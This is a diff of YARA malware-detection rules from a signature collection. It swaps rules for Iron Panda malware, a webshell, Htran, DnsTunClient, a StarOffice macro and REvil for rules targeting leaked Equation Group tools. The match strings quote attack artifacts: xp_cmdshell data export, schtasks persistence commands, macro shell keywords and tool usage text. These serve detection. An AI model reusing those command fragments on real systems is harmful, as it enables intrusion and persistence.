-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L1706-L1716"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "182a2488-ac3f-5dc6-aa61-d6d267574d10"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2381-L2395"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f59095f0ab15f26a1ead7eed8cdb4902"
-		logic_hash = "fa76e994beb2ab1b7950cf9d6391adf4e1ba45586a14a6340fa8a25a904821e4"
+		logic_hash = "9ae3e0c30c9dbee311d4e5576b1a447ac57f8b1786dc5753246ad3c08ccecb85"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5964966041f93d5d0fb63ce4a85cf9f7a73845065e10519b0947d4a065fdbdf2"
+
+	strings:
+		$s1 = "\\\\.\\%ls" fullword ascii
+		$s3 = "6\"6<6C6H6M6Z6f6t6" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 10MB and pe.exports ( "MemoryCallEntryPoint" ) and pe.exports ( "MemoryDefaultAlloc" ) and pe.exports ( "MemoryDefaultFree" ) and pe.exports ( "MemoryDefaultFreeLibrary" ) and pe.exports ( "MemoryDefaultGetProcAddress" ) and pe.exports ( "MemoryDefaultLoadLibrary" ) and pe.exports ( "MemoryFindResource" ) and pe.exports ( "MemoryFindResourceEx" ) and pe.exports ( "MemoryFreeLibrary" ) and pe.exports ( "MemoryGetProcAddress" ) and pe.exports ( "MemoryLoadLibrary" ) and pe.exports ( "MemoryLoadLibraryEx" ) and pe.exports ( "MemoryLoadResource" ) and pe.exports ( "MemoryLoadString" ) and pe.exports ( "MemoryLoadStringEx" ) and pe.exports ( "MemorySizeofResource" ) and pe.exports ( "callback" ) and pe.exports ( "crosscall2" ) and pe.exports ( "crosscall_386" )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_Hacktool_MSIL_PXELOOT_2_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setresourcename : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have the strings of various method names in the PXE And Loot code."
-		author = "FireEye"
-		id = "ff46a0e9-f7d2-57f2-9727-26b69ea5ba71"
-		date = "2020-12-08"
-		modified = "2023-01-27"
-		reference = "https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fireeye_redteam_tools.yar#L2088-L2113"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dc261147-3b52-57c3-9729-2645a0999a99"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2397-L2413"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d93100fe60c342e9e3b13150fd91c7d8"
-		logic_hash = "f9a9167b806e0e3df3720c13b4009e18c5a36913d255978cb001c2284533ea82"
+		logic_hash = "e26aac30e06da14060a955761d08e6f543db2f2747be2959b0090f60e6eb52a5"
 		score = 75
-		quality = 43
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "537793d5158aecd0debae25416450bd885725adfc8ca53b0577a3df4b0222e2e"
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str2 = "InvestigateRPC" ascii nocase wide
-		$str3 = "DhcpRecon" ascii nocase wide
-		$str4 = "UnMountWim" ascii nocase wide
-		$str5 = "remote WIM image" ascii nocase wide
-		$str6 = "DISMWrapper" ascii nocase wide
-		$str7 = "findTFTPServer" ascii nocase wide
-		$str8 = "DHCPRequestRecon" ascii nocase wide
-		$str9 = "DHCPDiscoverRecon" ascii nocase wide
-		$str10 = "GoodieFile" ascii nocase wide
-		$str11 = "InfoStore" ascii nocase wide
-		$str12 = "execute" ascii nocase wide
+		$x1 = "Updates the name of the dll or executable in the resource file" fullword ascii
+		$x2 = "*NOTE: SetResourceName does not work with PeddleCheap versions" fullword ascii
+		$x3 = "2 = [appinit.dll] level4 dll" fullword ascii
+		$x4 = "1 = [spcss32.exe] level3 exe" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_Macro_Staroffice : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Drivers_Implant : FILE
 {
 	meta:
-		description = "Suspicious macro in StarOffice"
-		author = "John Lambert @JohnLaTwC"
-		id = "92110a87-66b4-5fc5-b3f5-3e59ec2671b2"
-		date = "2019-02-06"
-		modified = "2021-05-27"
-		reference = "https://twitter.com/JohnLaTwC/status/1093259873993732096"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_macro_staroffice_suspicious.yar#L1-L38"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "727a0a8c-0019-53e9-9632-c610299305fc"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2415-L2431"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "49385335488fa0a598ed48203d9483c5c2f53ae287e003a8cf7d64d56280e62a"
-		score = 60
-		quality = 81
+		logic_hash = "45190a317f3d293dbc3015873080d1253bfb3298008f5dea69ab1a5780a70721"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		hash1 = "8495d37825dab8744f7d2c8049fc6b70b1777b9184f0abe69ce314795480ce39"
-		hash2 = "25b4214da1189fd30d3de7c538aa8b606f22c79e50444e5733fb1c6d23d71fbe"
-		hash3 = "322f314102f67a16587ab48a0f75dfaf27e4b044ffdc3b88578351c05b4f39db"
-		hash4 = "705429725437f7e0087a6159708df97992abaadff0fa48fdf25111d34a3e2f20"
-		hash5 = "7141d94e827d3b24810813d6b2e3fb851da0ee2958ef347154bc28153b23874a"
-		hash6 = "7c0e85c0a4d96080ca341d3496743f0f113b17613660812d40413be6d453eab4"
-		hash7 = "8d59f1e2abcab9efb7f833d478d1d1390e7456092f858b656ee0024daf3d1aa3"
-		hash8 = "9846b942d9d1e276c95361180e9326593ea46d3abcce9c116c204954bbfe3fdc"
-		hash9 = "aa0c83f339c8c16ad21dec41e4605d4e327adbbb78827dcad250ed64d2ceef1c"
-		hash10 = "b0be54c7210b06e60112a119c235e23c9edbe40b1c1ce1877534234f82b6b302"
-		hash11 = "bf581ebb96b8ca4f254ab4d200f9a053aff8187715573d9a1cbd443df0f554e3"
-		hash12 = "de45634064af31cb6768e4912cac284a76a6e66d398993df1aeee8ce26e0733b"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ee8b048f1c6ba821d92c15d614c2d937c32aeda7b7ea0943fd4f640b57b1c1ab"
 
 	strings:
-		$r1 = "StarBasic"
-		$r2 = "</script:module>"
-		$s1 = "Shell" nocase
-		$s2 = ".Run" nocase
-		$s3 = ".PutInClipboard" nocase
-		$s4 = "powershell" nocase
-		$fp1 = "LibreOffice project" ascii
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s2 = "hZwLoadDriver" fullword ascii
+		$op1 = { b0 01 e8 58 04 00 00 c3 33 }
 
 	condition:
-		filesize < 1MB and uint32be( 0 ) == 0x3c3f786d and all of ( $r* ) and 1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
 }
-rule SIGNATURE_BASE_Ironpanda_Dnstunclient : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Shares_Target : FILE
 {
 	meta:
-		description = "Iron Panda malware DnsTunClient - file named.exe"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd608176-d7e7-5819-a7d4-e8b89d4a59c2"
-		date = "2015-09-16"
+		id = "51245be4-6d24-57e4-8c92-c8c1ae5e3cf9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L10-L36"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2433-L2449"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a08db49e198068709b7e52f16d00a10d72b4d26562c0d82b4544f8b0fb259431"
-		logic_hash = "07c142f6eb11ecc8ed5f55d6b0cc7110c6268e189f3ce29215f75b7aba91a290"
-		score = 80
+		logic_hash = "11a1af97d720286a7fadf8b056f8f7add70acb041a828441166f5c74bc7a819d"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6c57fb33c5e7d2dee415ae6168c9c3e0decca41ffe023ff13056ff37609235cb"
 
 	strings:
-		$s1 = "dnstunclient -d or -domain <domain>" fullword ascii
-		$s2 = "dnstunclient -ip <server ip address>" fullword ascii
-		$s3 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"\\Microsoft\\Windows\\PLA\\System\\Microsoft Windows\" /tr " fullword ascii
-		$s4 = "C:\\Windows\\System32\\cmd.exe /C schtasks /create /tn \"Microsoft Windows\" /tr " fullword ascii
-		$s5 = "taskkill /im conime.exe" fullword ascii
-		$s6 = "\\dns control\\t-DNSTunnel\\DnsTunClient\\DnsTunClient.cpp" ascii
-		$s7 = "UDP error:can not bing the port(if there is unclosed the bind process?)" fullword ascii
-		$s8 = "use error domain,set domain pls use -d or -domain mark(Current: %s,recv %s)" fullword ascii
-		$s9 = "error: packet num error.the connection have condurt,pls try later" fullword ascii
-		$s10 = "Coversation produce one error:%s,coversation fail" fullword ascii
-		$s11 = "try to add many same pipe to select group(or mark is too easy)." fullword ascii
+		$s1 = "Select * from Win32_Share" fullword ascii
+		$s2 = "slocalhost" fullword wide
+		$s3 = "\\\\%ls\\root\\cimv2" fullword wide
+		$s4 = "\\\\%ls\\%ls" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 2 of them ) or 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Ironpanda_Malware1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntfltmgr : FILE
 {
 	meta:
-		description = "Iron Panda Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "14dc2611-4ca9-5dd2-ad00-9397a18d7be2"
-		date = "2015-09-16"
+		id = "402b14f5-4a7a-58fb-8f4a-0a29d6d34440"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L38-L55"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2451-L2475"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a0cee5822ddf254c254a5a0b7372c9d2b46b088a254a1208cb32f5fe7eca848a"
-		logic_hash = "4b50a2c7f0f94b678fc560eefb217c067e934f8e7d64bc0f0d16afcccccd0d08"
+		logic_hash = "9f280baf785f54218cbf47f65419cfe23c687e58021f36b5d116904d2cec9a9b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3df61b8ef42a995b8f15a0d38bc51f2f08f8d9a2afa1afc94c6f80671cf4a124"
+		hash2 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
+		hash3 = "980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43"
 
 	strings:
-		$x1 = "activedsimp.dll" fullword wide
-		$s1 = "get_BadLoginAddress" fullword ascii
-		$s2 = "get_LastFailedLogin" fullword ascii
-		$s3 = "ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED" fullword ascii
-		$s4 = "get_PasswordExpirationDate" fullword ascii
+		$s3 = "wCw3wDwAw2wNw@wEwZw2wDwEwBwZwFwFw4w2wZw5w1w4wFwZwGwOwGwGwEw5w2wFwGwDwFwOw" fullword ascii
+		$s6 = "w+w;w2w0w6w4w.w(wRw" fullword ascii
+		$op1 = { 80 f7 ff ff 49 89 84 34 18 02 00 00 41 83 a4 34 }
+		$op2 = { ff 15 0b 34 00 00 eb 92 }
+		$op3 = { 4d 8d b4 34 08 02 00 00 4d 85 f6 0f 84 ae }
+		$op4 = { 8b ca 2b ce 8d 34 01 0f b7 3e 66 3b 7d f0 89 75 }
+		$op5 = { 8a 40 01 00 c7 47 70 }
+		$op6 = { e9 3c ff ff ff 6a ff 8d 45 f0 50 e8 27 11 00 00 }
+		$op7 = { 8b 45 08 53 57 8b 7d 0c c7 40 34 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 4 of them )
 }
-rule SIGNATURE_BASE_Ironpanda_Webshell_JSP : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Diba_Target_BH : FILE
 {
 	meta:
-		description = "Iron Panda Malware JSP"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "38125418-7867-5073-a731-4f1d64e07588"
-		date = "2015-09-16"
+		id = "c6ae85b6-0670-558c-9ce5-64bd5822f35b"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L57-L72"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2477-L2492"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3be95477e1d9f3877b4355cff3fbcdd3589bb7f6349fd4ba6451e1e9d32b7fa6"
-		logic_hash = "747ce812b156bf03f8d14ef84e7d2e8535c7c70590dfcb50ce3e957bec745efc"
+		logic_hash = "273e38e287b1597753f653c0ed8300936581a1b767029d3f0ba757de589bcd5a"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7ae9a247b60dc31f424e8a7a3b3f1749ba792ff1f4ba67ac65336220021fce9f"
 
 	strings:
-		$s1 = "Bin_ExecSql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + Bin_TextBox_SaveP" ascii
-		$s2 = "tc.Text=\"<a href=\\\"javascript:Bin_PostBack('zcg_ClosePM','\"+Bin_ToBase64(de.Key.ToString())+\"')\\\">Close</a>\";" fullword ascii
-		$s3 = "Bin_ExecSql(\"IF OBJECT_ID('bin_temp')IS NOT NULL DROP TABLE bin_temp\");" fullword ascii
+		$op0 = { 44 89 20 e9 40 ff ff ff 8b c2 48 8b 5c 24 60 48 }
+		$op1 = { 45 33 c9 49 8d 7f 2c 41 ba }
+		$op2 = { 89 44 24 34 eb 17 4c 8d 44 24 28 8b 54 24 30 48 }
 
 	condition:
-		filesize < 330KB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Ironpanda_Malware_Htran : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_LP : FILE
 {
 	meta:
-		description = "Iron Panda Malware Htran"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7215f0da-9367-59b4-a78b-aeeebc4f2b69"
-		date = "2015-09-16"
+		id = "c3f8f0f9-80ab-5d8e-be42-59b90dc291cb"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L74-L102"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2494-L2508"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7903f94730a8508e9b272b3b56899b49736740cea5037ea7dbb4e690bcaf00e7"
-		logic_hash = "e7312a2d0ffc247eda20cb5453538a501bde6683bf34e7f4bf2230243474ba76"
+		logic_hash = "cd7b92f13e0a00d23baef70e38b476b62394106dfa70e831786f398c573aa744"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296"
 
 	strings:
-		$s1 = "[-] Gethostbyname(%s) error:%s" fullword ascii
-		$s2 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
-		$s3 = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
-		$s4 = "[-] ERROR: Must supply logfile name." fullword ascii
-		$s5 = "[SERVER]connection to %s:%d error" fullword ascii
-		$s6 = "[+] Make a Connection to %s:%d...." fullword ascii
-		$s7 = "[+] Waiting another Client on port:%d...." fullword ascii
-		$s8 = "[+] Accept a Client on port %d from %s" fullword ascii
-		$s9 = "[+] Make a Connection to %s:%d ......" fullword ascii
-		$s10 = "cmshared_get_ptr_from_atom" fullword ascii
-		$s11 = "_cmshared_get_ptr_from_atom" ascii
-		$s12 = "[+] OK! I Closed The Two Socket." fullword ascii
-		$s13 = "[-] TransmitPort invalid." fullword ascii
-		$s14 = "[+] Waiting for Client on port:%d ......" fullword ascii
+		$s1 = "* Failed to get connection information.  Aborting launcher!" fullword wide
+		$s2 = "Format: <command> <target port> [lp port]" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 125KB and 3 of them ) or 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Ironpanda_Malware2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remotecommand_Lp : FILE
 {
 	meta:
-		description = "Iron Panda Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63916f73-808d-5dc7-86f3-05c8b9c5650d"
-		date = "2015-09-16"
+		id = "98ace4d7-edd0-5e84-bac8-b69e5307f567"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L104-L121"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2510-L2524"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91"
-		logic_hash = "060c681e7127349464cd98f99cef6e184fbd18d2ec415dc6c95d8ac329e6fe7e"
+		logic_hash = "974772264324e7721f51a88534aaa3b4eb1d409e04f673783caf4849d90522de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846"
 
 	strings:
-		$s0 = "\\setup.exe" ascii
-		$s1 = "msi.dll.urlUT" fullword ascii
-		$s2 = "msi.dllUT" fullword ascii
-		$s3 = "setup.exeUT" fullword ascii
-		$s4 = "/c del /q %s" fullword ascii
+		$s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide
+		$s2 = "Unable to get TCP listen port: %08x" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Ironpanda_Malware3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Lp_Mstcp : FILE
 {
 	meta:
-		description = "Iron Panda Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bc3094ab-9dc8-5b9d-aa13-28daa7d5c13f"
-		date = "2015-09-16"
+		id = "afa4985e-7c8f-58fc-9881-219ccba6a495"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L123-L141"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2526-L2545"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5cd2af844e718570ae7ba9773a9075738c0b3b75c65909437c43201ce596a742"
-		logic_hash = "ca55fc5aa655fb221808b4c82db520cae24e0d93422293b6ed5e573b343e93ac"
+		logic_hash = "5d1423661f95d955f411414138da45cc4be59b2e6bf8e70f471b8f41fc9ea3f4"
 		score = 75
 		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd"
 
 	strings:
-		$s0 = "PluginDeflater.exe" fullword wide
-		$s1 = ".Deflated" fullword wide
-		$s2 = "PluginDeflater" fullword ascii
-		$s3 = "DeflateStream" fullword ascii
-		$s4 = "CompressionMode" fullword ascii
-		$s5 = "System.IO.Compression" fullword ascii
+		$s1 = "\\Registry\\User\\CurrentUser\\" wide
+		$s2 = "_PacketNDISRequestComplete@12\"" fullword ascii
+		$s3 = "_LDNdis5RegDeleteKeys@4" ascii
+		$op1 = { 89 7e 04 75 06 66 21 46 02 eb }
+		$op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 }
+		$op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $s* ) or all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_Ironpanda_Malware4 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Renamer : FILE
 {
 	meta:
-		description = "Iron Panda Malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0a72c1e1-b442-52d4-af52-b863abe5ba3c"
-		date = "2015-09-16"
+		id = "b5a7c8a8-c30d-5667-a458-6962a24061d3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/E4qia9"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_irontiger.yar#L143-L159"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2547-L2561"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0d6da946026154416f49df2283252d01ecfb0c41c27ef3bc79029483adc2240c"
-		logic_hash = "12661c8862eeb82d55a3912e0a499beb6bb19f7abe9ccfe6fa0506e6a032cfe4"
+		logic_hash = "4941f31be6674499b202a3071d795317e6d97fb19088ea370180708e3d04bca7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac"
 
 	strings:
-		$s0 = "TestPlugin.dll" fullword wide
-		$s1 = "<a href='http://www.baidu.com'>aasd</a>" fullword wide
-		$s2 = "Zcg.Test.AspxSpyPlugins" fullword ascii
-		$s6 = "TestPlugin" fullword ascii
+		$s1 = "FILE_NAME_CONVERSION.LOG" fullword wide
+		$s2 = "Log file exists. You must delete it!!!" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-
-rule SIGNATURE_BASE_APT_MAL_Revil_Kaseya_Jul21_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Exploit : FILE
 {
 	meta:
-		description = "Detects malware used in the Kaseya supply chain attack"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7356f4ea-183f-52ec-a167-fc16b8bfb55a"
-		date = "2021-07-02"
+		id = "67a4c8b8-87fb-5f2d-a4dd-299d087c77a3"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_revil_general.yar#L3-L30"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2563-L2579"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a7f9fa8f8e8a3a25728aa6a334924e0b4075f3422df6b92a2f544bb0ebb6bfad"
+		logic_hash = "6f04ec5d1066b34ebee2504f7d229610e525743f7536d58bf99fc4f89ac6aa3b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e"
-		hash2 = "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7"
-		hash3 = "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f"
-		hash4 = "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0"
 
 	strings:
-		$s1 = "Mpsvc.dll" wide fullword
-		$s2 = ":0:4:8:<:@:D:H:L:P:T:X:\\:`:d:h:l:p:t:x:H<L<P<\\<`<" ascii fullword
-		$op1 = { 40 87 01 c3 6a 08 68 f8 0e 41 00 e8 ae db ff ff be 80 25 41 00 39 35 ?? 32 41 00 }
-		$op2 = { 8b 40 04 2b c2 c1 f8 02 3b c8 0f 84 56 ff ff ff 68 15 50 40 00 2b c1 6a 04 }
-		$op3 = { 74 73 db e2 e8 ad 07 00 00 68 60 1a 40 00 e8 8f 04 00 00 e8 3a 05 00 00 50 e8 25 26 00 00 }
-		$op4 = { 75 05 8b 45 fc eb 4c c7 45 f8 00 00 00 00 6a 00 8d 45 f0 50 8b 4d 0c }
